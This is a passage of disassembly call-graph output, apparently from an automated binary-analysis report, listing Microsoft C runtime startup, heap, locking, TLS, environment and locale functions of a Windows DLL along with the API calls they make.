6c52a8b4 15723->15726 15727 6c52a8a5 15723->15727 15724 6c52a893 ___lock_fhandle 15724->15705 15730 6c525c53 _malloc GetModuleHandleW GetProcAddress ExitProcess 15725->15730 15729 6c52a914 __lock 67 API calls 15726->15729 15728 6c525348 __cftof2_l 67 API calls 15727->15728 15728->15724 15731 6c52a8bb 15729->15731 15730->15732 15733 6c52a8c3 15731->15733 15734 6c52a8ef 15731->15734 15732->15721 15732->15724 15735 6c52e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 15733->15735 15736 6c524618 __setenvp 67 API calls 15734->15736 15738 6c52a8ce 15735->15738 15737 6c52a8e0 15736->15737 15739 6c52a90b __mtinitlocknum RtlLeaveCriticalSection 15737->15739 15738->15737 15740 6c524618 __setenvp 67 API calls 15738->15740 15739->15724 15741 6c52a8da 15740->15741 15742 6c525348 __cftof2_l 67 API calls 15741->15742 15742->15737 15744 6c52c046 __FF_MSGBANNER 67 API calls 15743->15744 15745 6c525c09 15744->15745 15746 6c52be9b __NMSG_WRITE 67 API calls 15745->15746 15747 6c525c11 15746->15747 15748 6c52a033 __decode_pointer 6 API calls 15747->15748 15749 6c525c1c 15748->15749 15749->15703 15751 6c52aca0 RtlReAllocateHeap 15750->15751 15752 6c52acd4 RtlAllocateHeap 15750->15752 15754 6c52acbe 15751->15754 15755 6c52acc2 15751->15755 15753 6c52acf7 VirtualAlloc 15752->15753 15752->15754 15753->15754 15756 6c52ad11 HeapFree 15753->15756 15754->15709 15755->15752 15756->15754 15758 6c52ad54 VirtualAlloc 15757->15758 15760 6c52ad9b 15758->15760 15760->15712 15761->15716 15776 6c52a0ae TlsGetValue 15762->15776 15765 6c52a273 SetLastError 15765->15594 15768 6c52a033 __decode_pointer 6 API calls 15769 6c52a24b 15768->15769 15770 6c52a252 15769->15770 15771 6c52a26a 15769->15771 15787 6c52a11f 15770->15787 15805 6c524618 15771->15805 15774 6c52a25a GetCurrentThreadId 15774->15765 15775 6c52a270 15775->15765 15777 6c52a0c3 15776->15777 15778 6c52a0de 15776->15778 15779 6c52a033 __decode_pointer 6 API calls 15777->15779 15778->15765 15781 6c52a608 15778->15781 15780 6c52a0ce TlsSetValue 15779->15780 15780->15778 15783 6c52a611 15781->15783 15782 6c52b40b __calloc_impl 66 API calls 15782->15783 15783->15782 15784 6c52a231 15783->15784 15785 6c52a62f Sleep 15783->15785 15784->15765 15784->15768 15786 6c52a644 15785->15786 15786->15783 15786->15784 15788 6c5253bc ___lock_fhandle 15787->15788 15789 6c52a12b GetModuleHandleW 15788->15789 15790 6c52a13b 15789->15790 15795 6c52a141 15789->15795 15793 6c525bcf __crt_waiting_on_module_handle Sleep GetModuleHandleW 15790->15793 15791 6c52a159 GetProcAddress GetProcAddress 15792 6c52a17d 15791->15792 15794 6c52a914 __lock 63 API calls 15792->15794 15793->15795 15796 6c52a19c InterlockedIncrement 15794->15796 15795->15791 15795->15792 15797 6c52a1f4 __getptd_noexit RtlLeaveCriticalSection 15796->15797 15798 6c52a1b6 15797->15798 15799 6c52a914 __lock 63 API calls 15798->15799 15800 6c52a1bd 15799->15800 15801 6c530414 ___addlocaleref 8 API calls 15800->15801 15802 6c52a1db 15801->15802 15803 6c52a1fd __getptd_noexit RtlLeaveCriticalSection 15802->15803 15804 6c52a1e8 ___lock_fhandle 15803->15804 15804->15774 15807 6c524624 ___lock_fhandle 15805->15807 15806 6c524663 15808 6c52469d ___lock_fhandle __dosmaperr 15806->15808 15809 6c524678 HeapFree 15806->15809 15807->15806 15807->15808 15810 6c52a914 __lock 65 API calls 15807->15810 15808->15775 15809->15808 15811 6c52468a 15809->15811 15814 6c52463b ___sbh_find_block 15810->15814 15812 6c525348 __cftof2_l 65 API calls 15811->15812 15813 6c52468f GetLastError 15812->15813 15813->15808 15815 6c524655 15814->15815 15816 6c52a977 ___sbh_free_block __VEC_memcpy VirtualFree VirtualFree HeapFree 15814->15816 15817 6c52466e __setenvp RtlLeaveCriticalSection 15815->15817 15816->15815 15817->15806 15823 6c5244dd 15818->15823 15819 6c5244e1 15820 6c5244e6 15819->15820 15821 6c525348 __cftof2_l 67 API calls 15819->15821 15820->15517 15822 6c5244fd 15821->15822 15824 6c52815c __cftof2_l 6 API calls 15822->15824 15823->15819 15823->15820 15825 6c52452d 15823->15825 15824->15820 15825->15820 15826 6c525348 __cftof2_l 67 API calls 15825->15826 15826->15822 15828 6c51ba41 15827->15828 15829 6c51ba3c 15827->15829 15828->15450 15830 6c516d89 ctype RaiseException 15829->15830 15830->15828 15831->15460 15835 6c51bba5 15832->15835 15836 6c51bbb0 15835->15836 15837 6c51bbb5 15835->15837 15838 6c516dc1 ctype 2 API calls 15836->15838 15837->15477 15838->15837 15840 6c51c230 15839->15840 15841 6c51c235 15839->15841 15842 6c516dc1 ctype 2 API calls 15840->15842 15843 6c51c243 15841->15843 15853 6c51c1b7 15841->15853 15842->15841 15845 6c51c255 RtlEnterCriticalSection 15843->15845 15846 6c51c27f RtlEnterCriticalSection 15843->15846 15847 6c51c261 RtlInitializeCriticalSection 15845->15847 15848 6c51c274 RtlLeaveCriticalSection 15845->15848 15846->15425 15847->15848 15848->15846 15850 6c51c2a4 RtlLeaveCriticalSection 15849->15850 15851 6c51c29f 15849->15851 15850->15423 15852 6c516dc1 ctype 2 API calls 15851->15852 15852->15850 15854 6c51c1c0 RtlInitializeCriticalSection 15853->15854 15855 6c51c1d5 15853->15855 15854->15855 15855->15843 16892 6c52498c 16893 6c524997 16892->16893 16894 6c52499c 16892->16894 16910 6c52be02 16893->16910 16898 6c524896 16894->16898 16897 6c5249aa 16900 6c5248a2 ___lock_fhandle 16898->16900 16899 6c5248ef 16907 6c52493f ___lock_fhandle 16899->16907 16961 6c516894 16899->16961 16900->16899 16900->16907 16914 6c524761 16900->16914 16904 6c52491f 16905 6c524761 __CRT_INIT@12 156 API calls 16904->16905 16904->16907 16905->16907 16906 6c516894 ___DllMainCRTStartup 100 API calls 16908 6c524916 16906->16908 16907->16897 16909 6c524761 __CRT_INIT@12 156 API calls 16908->16909 16909->16904 16911 6c52be27 16910->16911 16912 6c52be34 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16910->16912 16911->16912 16913 6c52be2b 16911->16913 16912->16913 16913->16894 16915 6c524770 16914->16915 16916 6c5247ec 16914->16916 16965 6c52a6f4 HeapCreate 16915->16965 16918 6c524823 16916->16918 16923 6c5247f2 16916->16923 16919 6c524828 16918->16919 16920 6c524881 16918->16920 16921 6c52a0ae ___set_flsgetvalue 8 API calls 16919->16921 16937 6c52477b 16920->16937 17101 6c52a3c8 16920->17101 16926 6c52482d 16921->16926 16924 6c52480d 16923->16924 16923->16937 17098 6c525e85 16923->17098 16930 6c52b77d __ioterm 68 API calls 16924->16930 16924->16937 16931 6c52a608 __calloc_crt 67 API calls 16926->16931 16929 6c524787 __RTC_Initialize 16932 6c52478b 16929->16932 16939 6c524797 GetCommandLineA 16929->16939 16933 6c524817 16930->16933 16934 6c524839 16931->16934 17076 6c52a724 16932->17076 16936 6c52a0e2 __mtterm 70 API calls 16933->16936 16934->16937 16940 6c52a033 __decode_pointer 6 API calls 16934->16940 16938 6c52481c 16936->16938 16937->16899 16942 6c52a724 __heap_term 4 API calls 16938->16942 17001 6c52bafe 16939->17001 16941 6c524857 16940->16941 16946 6c524875 16941->16946 16947 6c52485e 16941->16947 16942->16937 16950 6c524618 __setenvp 67 API calls 16946->16950 16949 6c52a11f __getptd_noexit 67 API calls 16947->16949 16948 6c5247b1 16951 6c5247b5 16948->16951 17042 6c52ba43 16948->17042 16952 6c524865 GetCurrentThreadId 16949->16952 16950->16937 17082 6c52a0e2 16951->17082 16952->16937 16956 6c5247d5 16956->16937 17093 6c52b77d 16956->17093 16962 6c5167cb 16961->16962 16963 6c5168a2 16961->16963 16962->16904 16962->16906 16963->16962 16964 6c51aef1 ctype 100 API calls 16963->16964 16964->16962 16966 6c524776 16965->16966 16966->16937 16967 6c52a436 GetModuleHandleW 16966->16967 16968 6c52a451 16967->16968 16969 6c52a44a 16967->16969 16971 6c52a45b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 16968->16971 16972 6c52a5b9 16968->16972 17112 6c525bcf 16969->17112 16975 6c52a4a4 TlsAlloc 16971->16975 16973 6c52a0e2 __mtterm 70 API calls 16972->16973 16977 6c52a5be 16973->16977 16975->16977 16978 6c52a4f2 TlsSetValue 16975->16978 16977->16929 16978->16977 16979 6c52a503 16978->16979 17116 6c525e94 16979->17116 16982 6c529fb8 __encode_pointer 6 API calls 16983 6c52a513 16982->16983 16984 6c529fb8 __encode_pointer 6 API calls 16983->16984 16985 6c52a523 16984->16985 16986 6c529fb8 __encode_pointer 6 API calls 16985->16986 16987 6c52a533 16986->16987 16988 6c529fb8 __encode_pointer 6 API calls 16987->16988 16989 6c52a543 16988->16989 17123 6c52a798 16989->17123 16992 6c52a033 __decode_pointer 6 API calls 16993 6c52a564 16992->16993 16993->16972 16994 6c52a608 __calloc_crt 67 API calls 16993->16994 16995 6c52a57d 16994->16995 16995->16972 16996 6c52a033 __decode_pointer 6 API calls 16995->16996 16997 6c52a597 16996->16997 16997->16972 16998 6c52a59e 16997->16998 16999 6c52a11f __getptd_noexit 67 API calls 16998->16999 17000 6c52a5a6 GetCurrentThreadId 16999->17000 17000->16977 17002 6c52bb3b 17001->17002 17003 6c52bb1c GetEnvironmentStringsW 17001->17003 17005 6c52bb24 17002->17005 17008 6c52bbd4 17002->17008 17004 6c52bb30 GetLastError 17003->17004 17003->17005 17004->17002 17006 6c52bb66 WideCharToMultiByte 17005->17006 17007 6c52bb57 GetEnvironmentStringsW 17005->17007 17013 6c52bb9a 17006->17013 17014 6c52bbc9 FreeEnvironmentStringsW 17006->17014 17007->17006 17010 6c5247a7 17007->17010 17009 6c52bbdd GetEnvironmentStrings 17008->17009 17008->17010 17009->17010 17011 6c52bbed 17009->17011 17027 6c52b529 17010->17027 17016 6c52a5c3 __malloc_crt 67 API calls 17011->17016 17017 6c52a5c3 __malloc_crt 67 API calls 17013->17017 17014->17010 17018 6c52bc07 17016->17018 17019 6c52bba0 17017->17019 17020 6c52bc1a ___crtGetEnvironmentStringsA 17018->17020 17021 6c52bc0e FreeEnvironmentStringsA 17018->17021 17019->17014 17022 6c52bba8 WideCharToMultiByte 17019->17022 17025 6c52bc24 FreeEnvironmentStringsA 17020->17025 17021->17010 17023 6c52bbc2 17022->17023 17024 6c52bbba 17022->17024 17023->17014 17026 6c524618 __setenvp 67 API calls 17024->17026 17025->17010 17026->17023 17130 6c5253bc 17027->17130 17029 6c52b535 GetStartupInfoA 17030 6c52a608 __calloc_crt 67 API calls 17029->17030 17037 6c52b556 17030->17037 17031 6c52b774 ___lock_fhandle 17031->16948 17032 6c52b6f1 GetStdHandle 17036 6c52b6bb 17032->17036 17033 6c52b756 SetHandleCount 17033->17031 17034 6c52a608 __calloc_crt 67 API calls 17034->17037 17035 6c52b703 GetFileType 17035->17036 17036->17031 17036->17032 17036->17033 17036->17035 17038 6c52e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 17036->17038 17037->17031 17037->17034 17037->17036 17039 6c52b63e 17037->17039 17038->17036 17039->17031 17039->17036 17040 6c52b667 GetFileType 17039->17040 17041 6c52e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 17039->17041 17040->17039 17041->17039 17043 6c52ba58 17042->17043 17044 6c52ba5d GetModuleFileNameA 17042->17044 17137 6c5302ad 17043->17137 17046 6c52ba84 17044->17046 17131 6c52b8a9 17046->17131 17049 6c5247c1 17049->16956 17055 6c52b7cb 17049->17055 17050 6c52bac0 17051 6c52a5c3 __malloc_crt 67 API calls 17050->17051 17052 6c52bac6 17051->17052 17052->17049 17053 6c52b8a9 _parse_cmdline 77 API calls 17052->17053 17054 6c52bae0 17053->17054 17054->17049 17056 6c52b7d4 17055->17056 17059 6c52b7d9 _strlen 17055->17059 17057 6c5302ad ___initmbctable 111 API calls 17056->17057 17057->17059 17058 6c5247ca 17058->16956 17070 6c525cbe 17058->17070 17059->17058 17060 6c52a608 __calloc_crt 67 API calls 17059->17060 17065 6c52b80e _strlen 17060->17065 17061 6c52b86c 17062 6c524618 __setenvp 67 API calls 17061->17062 17062->17058 17063 6c52a608 __calloc_crt 67 API calls 17063->17065 17064 6c52b892 17066 6c524618 __setenvp 67 API calls 17064->17066 17065->17058 17065->17061 17065->17063 17065->17064 17067 6c530997 _strcpy_s 67 API calls 17065->17067 17068 6c52b853 17065->17068 17066->17058 17067->17065 17068->17065 17069 6c528034 __invoke_watson 10 API calls 17068->17069 17069->17068 17071 6c525ccc __IsNonwritableInCurrentImage 17070->17071 17436 6c52df82 17071->17436 17073 6c525cea __initterm_e 17075 6c525d09 __IsNonwritableInCurrentImage __initterm 17073->17075 17440 6c5244b4 17073->17440 17075->16956 17077 6c52a784 HeapDestroy 17076->17077 17078 6c52a72d 17076->17078 17077->16937 17079 6c52a772 HeapFree 17078->17079 17080 6c52a749 VirtualFree HeapFree 17078->17080 17079->17077 17080->17080 17081 6c52a771 17080->17081 17081->17079 17083 6c52a0f8 17082->17083 17084 6c52a0ec 17082->17084 17085 6c52a10c TlsFree 17083->17085 17087 6c52a11a 17083->17087 17086 6c52a033 __decode_pointer 6 API calls 17084->17086 17085->17087 17086->17083 17088 6c52a7ff RtlDeleteCriticalSection 17087->17088 17089 6c52a817 17087->17089 17090 6c524618 __setenvp 67 API calls 17088->17090 17091 6c52a829 RtlDeleteCriticalSection 17089->17091 17092 6c52a837 17089->17092 17090->17087 17091->17089 17092->16932 17097 6c52b786 17093->17097 17094 6c52b7c8 17094->16951 17095 6c524618 __setenvp 67 API calls 17095->17097 17096 6c52b79a RtlDeleteCriticalSection 17096->17097 17097->17094 17097->17095 17097->17096 17486 6c525d43 17098->17486 17100 6c525e90 17100->16924 17102 6c52a421 17101->17102 17103 6c52a3d6 17101->17103 17104 6c52a434 17102->17104 17105 6c52a42b TlsSetValue 17102->17105 17106 6c52a3ff 17103->17106 17107 6c52a3dc TlsGetValue 17103->17107 17104->16937 17105->17104 17109 6c52a033 __decode_pointer 6 API calls 17106->17109 17107->17106 17108 6c52a3ef TlsGetValue 17107->17108 17108->17106 17110 6c52a416 17109->17110 17509 6c52a299 17110->17509 17113 6c525bda Sleep GetModuleHandleW 17112->17113 17114 6c525bf8 17113->17114 17115 6c525bfc 17113->17115 17114->17113 17114->17115 17115->16968 17117 6c52a02a _raise 6 API calls 17116->17117 17118 6c525e9c __init_pointers __initp_misc_winsig 17117->17118 17127 6c52cdf3 17118->17127 17121 6c529fb8 __encode_pointer 6 API calls 17122 6c525ed8 17121->17122 17122->16982 17124 6c52a7a3 17123->17124 17125 6c52a550 17124->17125 17126 6c52e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 17124->17126 17125->16972 17125->16992 17126->17124 17128 6c529fb8 __encode_pointer 6 API calls 17127->17128 17129 6c525ece 17128->17129 17129->17121 17130->17029 17132 6c52b8c8 17131->17132 17135 6c52b935 17132->17135 17141 6c530a52 17132->17141 17134 6c52ba33 17134->17049 17134->17050 17135->17134 17136 6c530a52 77 API calls _parse_cmdline 17135->17136 17136->17135 17138 6c5302b6 17137->17138 17139 6c5302bd 17137->17139 17258 6c530113 17138->17258 17139->17044 17144 6c5309ff 17141->17144 17147 6c528659 17144->17147 17148 6c52866c 17147->17148 17152 6c5286b9 17147->17152 17149 6c52a27f __getptd 67 API calls 17148->17149 17150 6c528671 17149->17150 17151 6c528699 17150->17151 17155 6c53057a 17150->17155 17151->17152 17170 6c52fe0e 17151->17170 17152->17132 17156 6c530586 ___lock_fhandle 17155->17156 17157 6c52a27f __getptd 67 API calls 17156->17157 17158 6c53058b 17157->17158 17159 6c5305b9 17158->17159 17161 6c53059d 17158->17161 17160 6c52a914 __lock 67 API calls 17159->17160 17162 6c5305c0 17160->17162 17163 6c52a27f __getptd 67 API calls 17161->17163 17186 6c53053c 17162->17186 17165 6c5305a2 17163->17165 17167 6c5305b0 ___lock_fhandle 17165->17167 17169 6c525bff __amsg_exit 67 API calls 17165->17169 17167->17151 17169->17167 17171 6c52fe1a ___lock_fhandle 17170->17171 17172 6c52a27f __getptd 67 API calls 17171->17172 17173 6c52fe1f 17172->17173 17174 6c52fe31 17173->17174 17175 6c52a914 __lock 67 API calls 17173->17175 17177 6c52fe3f ___lock_fhandle 17174->17177 17179 6c525bff __amsg_exit 67 API calls 17174->17179 17176 6c52fe4f 17175->17176 17178 6c52fe98 17176->17178 17181 6c52fe80 InterlockedIncrement 17176->17181 17182 6c52fe66 InterlockedDecrement 17176->17182 17177->17152 17254 6c52fea9 17178->17254 17179->17177 17181->17178 17182->17181 17183 6c52fe71 17182->17183 17183->17181 17184 6c524618 __setenvp 67 API calls 17183->17184 17185 6c52fe7f 17184->17185 17185->17181 17187 6c530540 17186->17187 17188 6c530572 17186->17188 17187->17188 17197 6c530414 InterlockedIncrement 17187->17197 17194 6c5305e4 17188->17194 17190 6c530553 17190->17188 17209 6c5304a3 17190->17209 17253 6c52a83a RtlLeaveCriticalSection 17194->17253 17196 6c5305eb 17196->17165 17198 6c530432 InterlockedIncrement 17197->17198 17199 6c530435 17197->17199 17198->17199 17200 6c530442 17199->17200 17201 6c53043f InterlockedIncrement 17199->17201 17202 6c53044f 17200->17202 17203 6c53044c InterlockedIncrement 17200->17203 17201->17200 17204 6c530459 InterlockedIncrement 17202->17204 17206 6c53045c 17202->17206 17203->17202 17204->17206 17205 6c530475 InterlockedIncrement 17205->17206 17206->17205 17207 6c530485 InterlockedIncrement 17206->17207 17208 6c530490 InterlockedIncrement 17206->17208 17207->17206 17208->17190 17210 6c530537 17209->17210 17211 6c5304b4 InterlockedDecrement 17209->17211 17210->17188 17223 6c5302cb 17210->17223 17212 6c5304c9 InterlockedDecrement 17211->17212 17213 6c5304cc 17211->17213 17212->17213 17214 6c5304d6 InterlockedDecrement 17213->17214 17215 6c5304d9 17213->17215 17214->17215 17216 6c5304e3 InterlockedDecrement 17215->17216 17217 6c5304e6 17215->17217 17216->17217 17218 6c5304f0 InterlockedDecrement 17217->17218 17220 6c5304f3 17217->17220 17218->17220 17219 6c53050c InterlockedDecrement 17219->17220 17220->17219 17221 6c53051c InterlockedDecrement 17220->17221 17222 6c530527 InterlockedDecrement 17220->17222 17221->17220 17222->17210 17224 6c5302e2 17223->17224 17225 6c53034f 17223->17225 17224->17225 17230 6c530316 17224->17230 17235 6c524618 __setenvp 67 API calls 17224->17235 17226 6c524618 __setenvp 67 API calls 17225->17226 17227 6c53039c 17225->17227 17228 6c530370 17226->17228 17229 6c532365 ___free_lc_time 67 API calls 17227->17229 17239 6c5303c3 17227->17239 17232 6c524618 __setenvp 67 API calls 17228->17232 17231 6c5303bc 17229->17231 17233 6c530337 17230->17233 17243 6c524618 __setenvp 67 API calls 17230->17243 17234 6c524618 __setenvp 67 API calls 17231->17234 17237 6c530383 17232->17237 17238 6c524618 __setenvp 67 API calls 17233->17238 17234->17239 17240 6c53030b 17235->17240 17236 6c530408 17241 6c524618 __setenvp 67 API calls 17236->17241 17242 6c524618 __setenvp 67 API calls 17237->17242 17244 6c530344 17238->17244 17239->17236 17249 6c524618 67 API calls __setenvp 17239->17249 17245 6c53253f ___free_lconv_mon 67 API calls 17240->17245 17246 6c53040e 17241->17246 17247 6c530391 17242->17247 17248 6c53032c 17243->17248 17250 6c524618 __setenvp 67 API calls 17244->17250 17245->17230 17246->17188 17251 6c524618 __setenvp 67 API calls 17247->17251 17252 6c5324fa ___free_lconv_num 67 API calls 17248->17252 17249->17239 17250->17225 17251->17227 17252->17233 17253->17196 17257 6c52a83a RtlLeaveCriticalSection 17254->17257 17256 6c52feb0 17256->17174 17257->17256 17259 6c53011f ___lock_fhandle 17258->17259 17260 6c52a27f __getptd 67 API calls 17259->17260 17261 6c530128 17260->17261 17262 6c52fe0e _LocaleUpdate::_LocaleUpdate 69 API calls 17261->17262 17263 6c530132 17262->17263 17289 6c52feb2 17263->17289 17266 6c52a5c3 __malloc_crt 67 API calls 17267 6c530153 17266->17267 17279 6c530272 ___lock_fhandle 17267->17279 17296 6c52ff2e 17267->17296 17270 6c530183 InterlockedDecrement 17272 6c530193 17270->17272 17273 6c5301a4 InterlockedIncrement 17270->17273 17271 6c53027f 17275 6c530292 17271->17275 17278 6c524618 __setenvp 67 API calls 17271->17278 17271->17279 17272->17273 17277 6c524618 __setenvp 67 API calls 17272->17277 17274 6c5301ba 17273->17274 17273->17279 17274->17279 17281 6c52a914 __lock 67 API calls 17274->17281 17276 6c525348 __cftof2_l 67 API calls 17275->17276 17276->17279 17280 6c5301a3 17277->17280 17278->17275 17279->17139 17280->17273 17283 6c5301ce InterlockedDecrement 17281->17283 17284 6c53024a 17283->17284 17285 6c53025d InterlockedIncrement 17283->17285 17284->17285 17287 6c524618 __setenvp 67 API calls 17284->17287 17306 6c530274 17285->17306 17288 6c53025c 17287->17288 17288->17285 17290 6c528659 _LocaleUpdate::_LocaleUpdate 77 API calls 17289->17290 17291 6c52fec6 17290->17291 17292 6c52fed1 GetOEMCP 17291->17292 17293 6c52feef 17291->17293 17295 6c52fee1 17292->17295 17294 6c52fef4 GetACP 17293->17294 17293->17295 17294->17295 17295->17266 17295->17279 17297 6c52feb2 getSystemCP 79 API calls 17296->17297 17298 6c52ff4e 17297->17298 17299 6c52ff59 setSBCS 17298->17299 17301 6c52ff9d IsValidCodePage 17298->17301 17305 6c52ffc2 _memset __setmbcp_nolock 17298->17305 17300 6c523f34 _$I10_OUTPUT 5 API calls 17299->17300 17302 6c530111 17300->17302 17301->17299 17303 6c52ffaf GetCPInfo 17301->17303 17302->17270 17302->17271 17303->17299 17303->17305 17309 6c52fc7b GetCPInfo 17305->17309 17435 6c52a83a RtlLeaveCriticalSection 17306->17435 17308 6c53027b 17308->17279 17310 6c52fd61 17309->17310 17315 6c52fcaf _memset 17309->17315 17314 6c523f34 _$I10_OUTPUT 5 API calls 17310->17314 17317 6c52fe0c 17314->17317 17319 6c532323 17315->17319 17317->17305 17318 6c532124 ___crtLCMapStringA 102 API calls 17318->17310 17320 6c528659 _LocaleUpdate::_LocaleUpdate 77 API calls 17319->17320 17321 6c532336 17320->17321 17329 6c532169 17321->17329 17324 6c532124 17325 6c528659 _LocaleUpdate::_LocaleUpdate 77 API calls 17324->17325 17326 6c532137 17325->17326 17388 6c531d7f 17326->17388 17330 6c5321b5 17329->17330 17331 6c53218a GetStringTypeW 17329->17331 17332 6c5321a2 17330->17332 17334 6c53229c 17330->17334 17331->17332 17333 6c5321aa GetLastError 17331->17333 17335 6c5321ee MultiByteToWideChar 17332->17335 17343 6c532296 17332->17343 17333->17330 17357 6c534dbc GetLocaleInfoA 17334->17357 17337 6c53221b 17335->17337 17335->17343 17344 6c5249fe _malloc 67 API calls 17337->17344 17352 6c532230 _memset ___convertcp 17337->17352 17338 6c523f34 _$I10_OUTPUT 5 API calls 17339 6c52fd1c 17338->17339 17339->17324 17341 6c5322ed GetStringTypeA 17342 6c532308 17341->17342 17341->17343 17347 6c524618 __setenvp 67 API calls 17342->17347 17343->17338 17344->17352 17346 6c532269 MultiByteToWideChar 17349 6c532290 17346->17349 17350 6c53227f GetStringTypeW 17346->17350 17347->17343 17353 6c531006 17349->17353 17350->17349 17352->17343 17352->17346 17354 6c531012 17353->17354 17355 6c531023 17353->17355 17354->17355 17356 6c524618 __setenvp 67 API calls 17354->17356 17355->17343 17356->17355 17358 6c534dea 17357->17358 17359 6c534def 17357->17359 17361 6c523f34 _$I10_OUTPUT 5 API calls 17358->17361 17360 6c531026 ___ansicp 90 API calls 17359->17360 17360->17358 17362 6c5322c0 17361->17362 17362->17341 17362->17343 17363 6c534e05 17362->17363 17364 6c534e45 GetCPInfo 17363->17364 17369 6c534ecf 17363->17369 17365 6c534eba MultiByteToWideChar 17364->17365 17366 6c534e5c 17364->17366 17365->17369 17372 6c534e75 _strlen 17365->17372 17366->17365 17367 6c534e62 GetCPInfo 17366->17367 17367->17365 17370 6c534e6f 17367->17370 17368 6c523f34 _$I10_OUTPUT 5 API calls 17371 6c5322e1 17368->17371 17369->17368 17370->17365 17370->17372 17371->17341 17371->17343 17373 6c5249fe _malloc 67 API calls 17372->17373 17374 6c534ea7 _memset ___convertcp 17372->17374 17373->17374 17374->17369 17375 6c534f04 MultiByteToWideChar 17374->17375 17376 6c534f1c 17375->17376 17380 6c534f3b 17375->17380 17378 6c534f23 WideCharToMultiByte 17376->17378 17379 6c534f40 17376->17379 17377 6c531006 __freea 67 API calls 17377->17369 17378->17380 17381 6c534f4b WideCharToMultiByte 17379->17381 17382 6c534f5f 17379->17382 17380->17377 17381->17380 17381->17382 17383 6c52a608 __calloc_crt 67 API calls 17382->17383 17384 6c534f67 17383->17384 17384->17380 17385 6c534f70 WideCharToMultiByte 17384->17385 17385->17380 17386 6c534f82 17385->17386 17387 6c524618 __setenvp 67 API calls 17386->17387 17387->17380 17389 6c531da0 LCMapStringW 17388->17389 17392 6c531dbb 17388->17392 17390 6c531dc3 GetLastError 17389->17390 17389->17392 17390->17392 17391 6c531fb9 17394 6c534dbc ___ansicp 91 API calls 17391->17394 17392->17391 17393 6c531e15 17392->17393 17395 6c531e2e MultiByteToWideChar 17393->17395 17418 6c531fb0 17393->17418 17397 6c531fe1 17394->17397 17402 6c531e5b 17395->17402 17395->17418 17396 6c523f34 _$I10_OUTPUT 5 API calls 17398 6c52fd3c 17396->17398 17399 6c5320d5 LCMapStringA 17397->17399 17400 6c531ffa 17397->17400 17397->17418 17398->17318 17434 6c532031 17399->17434 17403 6c534e05 ___convertcp 74 API calls 17400->17403 17401 6c531eac MultiByteToWideChar 17404 6c531ec5 LCMapStringW 17401->17404 17428 6c531fa7 17401->17428 17406 6c5249fe _malloc 67 API calls 17402->17406 17414 6c531e74 ___convertcp 17402->17414 17407 6c53200c 17403->17407 17408 6c531ee6 17404->17408 17404->17428 17405 6c5320fc 17416 6c524618 __setenvp 67 API calls 17405->17416 17405->17418 17406->17414 17410 6c532016 LCMapStringA 17407->17410 17407->17418 17412 6c531f18 17408->17412 17413 6c531eef 17408->17413 17409 6c524618 __setenvp 67 API calls 17409->17405 17415 6c532038 17410->17415 17410->17434 17411 6c531006 __freea 67 API calls 17411->17418 17423 6c5249fe _malloc 67 API calls 17412->17423 17429 6c531f33 ___convertcp 17412->17429 17417 6c531f01 LCMapStringW 17413->17417 17413->17428 17414->17401 17414->17418 17420 6c5249fe _malloc 67 API calls 17415->17420 17424 6c532049 _memset ___convertcp 17415->17424 17416->17418 17417->17428 17418->17396 17419 6c531f67 LCMapStringW 17421 6c531fa1 17419->17421 17422 6c531f7f WideCharToMultiByte 17419->17422 17420->17424 17425 6c531006 __freea 67 API calls 17421->17425 17422->17421 17423->17429 17426 6c532087 LCMapStringA 17424->17426 17424->17434 17425->17428 17430 6c5320a3 17426->17430 17431 6c5320a7 17426->17431 17428->17411 17429->17419 17429->17428 17433 6c531006 __freea 67 API calls 17430->17433 17432 6c534e05 ___convertcp 74 API calls 17431->17432 17432->17430 17433->17434 17434->17405 17434->17409 17435->17308 17437 6c52df88 17436->17437 17438 6c529fb8 __encode_pointer 6 API calls 17437->17438 17439 6c52dfa0 17437->17439 17438->17437 17439->17073 17443 6c524478 17440->17443 17442 6c5244c1 17442->17075 17444 6c524484 ___lock_fhandle 17443->17444 17451 6c525c6b 17444->17451 17450 6c5244a5 ___lock_fhandle 17450->17442 17452 6c52a914 __lock 67 API calls 17451->17452 17453 6c524489 17452->17453 17454 6c52438d 17453->17454 17455 6c52a033 __decode_pointer 6 API calls 17454->17455 17456 6c5243a1 17455->17456 17457 6c52a033 __decode_pointer 6 API calls 17456->17457 17458 6c5243b1 17457->17458 17459 6c527637 __msize 68 API calls 17458->17459 17469 6c524434 17458->17469 17460 6c5243cf 17459->17460 17461 6c52441b 17460->17461 17463 6c5243ea 17460->17463 17464 6c5243f9 17460->17464 17462 6c529fb8 __encode_pointer 6 API calls 17461->17462 17465 6c524429 17462->17465 17477 6c52a654 17463->17477 17468 6c5243f3 17464->17468 17464->17469 17466 6c529fb8 __encode_pointer 6 API calls 17465->17466 17466->17469 17468->17464 17470 6c52a654 __realloc_crt 73 API calls 17468->17470 17471 6c52440f 17468->17471 17474 6c5244ae 17469->17474 17472 6c524409 17470->17472 17473 6c529fb8 __encode_pointer 6 API calls 17471->17473 17472->17469 17472->17471 17473->17461 17482 6c525c74 17474->17482 17479 6c52a65d 17477->17479 17478 6c524ac8 _realloc 72 API calls 17478->17479 17479->17478 17480 6c52a69c 17479->17480 17481 6c52a67d Sleep 17479->17481 17480->17468 17481->17479 17485 6c52a83a RtlLeaveCriticalSection 17482->17485 17484 6c5244b3 17484->17450 17485->17484 17487 6c525d4f ___lock_fhandle 17486->17487 17488 6c52a914 __lock 67 API calls 17487->17488 17489 6c525d56 17488->17489 17491 6c52a033 __decode_pointer 6 API calls 17489->17491 17492 6c525e0f __initterm 17489->17492 17493 6c525d8d 17491->17493 17503 6c525e5a 17492->17503 17493->17492 17497 6c52a033 __decode_pointer 6 API calls 17493->17497 17495 6c525e57 ___lock_fhandle 17495->17100 17502 6c525da2 17497->17502 17498 6c525e4e 17499 6c525c53 _malloc 3 API calls 17498->17499 17499->17495 17500 6c52a02a 6 API calls _raise 17500->17502 17501 6c52a033 6 API calls __decode_pointer 17501->17502 17502->17492 17502->17500 17502->17501 17504 6c525e60 17503->17504 17505 6c525e3b 17503->17505 17508 6c52a83a RtlLeaveCriticalSection 17504->17508 17505->17495 17507 6c52a83a RtlLeaveCriticalSection 17505->17507 17507->17498 17508->17505 17510 6c52a2a5 ___lock_fhandle 17509->17510 17511 